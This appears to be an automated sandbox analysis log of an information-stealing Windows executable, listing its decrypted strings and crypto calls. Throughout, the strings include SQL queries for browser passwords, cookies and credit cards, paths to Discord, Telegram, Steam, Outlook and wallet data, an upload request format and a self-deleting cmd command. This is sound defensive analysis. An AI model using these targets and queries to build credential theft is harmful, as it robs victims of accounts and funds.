Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: NSS_Init
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: NSS_Shutdown
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: PK11_FreeSlot
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: PK11_Authenticate
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: C:\ProgramData\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: browser:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: profile:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: url:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: login:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: password:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Opera
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: OperaGX
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Network
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: cookies
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: .txt
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: TRUE
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: FALSE
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: autofill
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: history
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: cc
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: name:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: month:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: year:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: card:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Cookies
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Login Data
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Web Data
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: History
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: logins.json
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: formSubmitURL
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: usernameField
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: encryptedUsername
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: encryptedPassword
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: guid
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: cookies.sqlite
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: formhistory.sqlite
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: places.sqlite
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: plugins
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Local Extension Settings
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Sync Extension Settings
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: IndexedDB
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Opera Stable
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Opera GX Stable
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: CURRENT
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: chrome-extension_
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Local State
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: profiles.ini
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: chrome
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: opera
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: firefox
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: wallets
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %08lX%04lX%lu
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: ProductName
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: x32
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: x64
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: DisplayName
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: DisplayVersion
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Network Info:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - IP: IP?
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Country: ISO?
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: System Summary:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - HWID:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - OS:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Architecture:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - UserName:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Computer Name:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Local Time:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - UTC:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Language:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Keyboards:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Laptop:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Running Path:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - CPU:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Threads:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Cores:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - RAM:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - Display Resolution:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: - GPU:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: User Agents:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Installed Apps:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: All Users:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Current User:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Process List:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: system_info.txt
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: freebl3.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: mozglue.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: msvcp140.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: nss3.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: softokn3.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: vcruntime140.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \Temp\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: .exe
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: runas
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: open
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: /c start
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %DESKTOP%
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %APPDATA%
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %USERPROFILE%
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %DOCUMENTS%
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: %RECENT%
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: *.lnk
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: files
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \discord\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \Local Storage\leveldb
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \Telegram Desktop\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: key_datas
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: map*
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: F8806DD0C461824F*
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Telegram
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Tox
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: *.tox
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: *.ini
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Password
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: 00000001
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: 00000002
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: 00000003
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: 00000004
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Pidgin
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \.purple\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: accounts.xml
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: token:
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Software\Valve\Steam
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: SteamPath
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \config\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: ssfn*
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: config.vdf
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: DialogConfig.vdf
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: libraryfolders.vdf
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: loginusers.vdf
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \Steam\
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: sqlite3.dll
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: done
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: soft
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: \Discord\tokens.txt
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: https
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: POST
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: HTTP/1.1
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: hwid
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: build
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: token
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: file_name
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: file
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: message
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack String decryptor: screenshot.jpg
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBCA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 6_2_6CBCA9A0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBC44C0 PK11_PubEncrypt, 6_2_6CBC44C0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB94420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 6_2_6CB94420
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBC4440 PK11_PrivDecrypt, 6_2_6CBC4440
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CC125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 6_2_6CC125B0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBAE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 6_2_6CBAE6E0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBA8670 PK11_ExportEncryptedPrivKeyInfo, 6_2_6CBA8670
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBCA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 6_2_6CBCA650
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBEA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 6_2_6CBEA730
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBF0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 6_2_6CBF0180
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBC43B0 PK11_PubEncryptPKCS1,PR_SetError, 6_2_6CBC43B0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBE7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 6_2_6CBE7C00
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBEBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 6_2_6CBEBD30
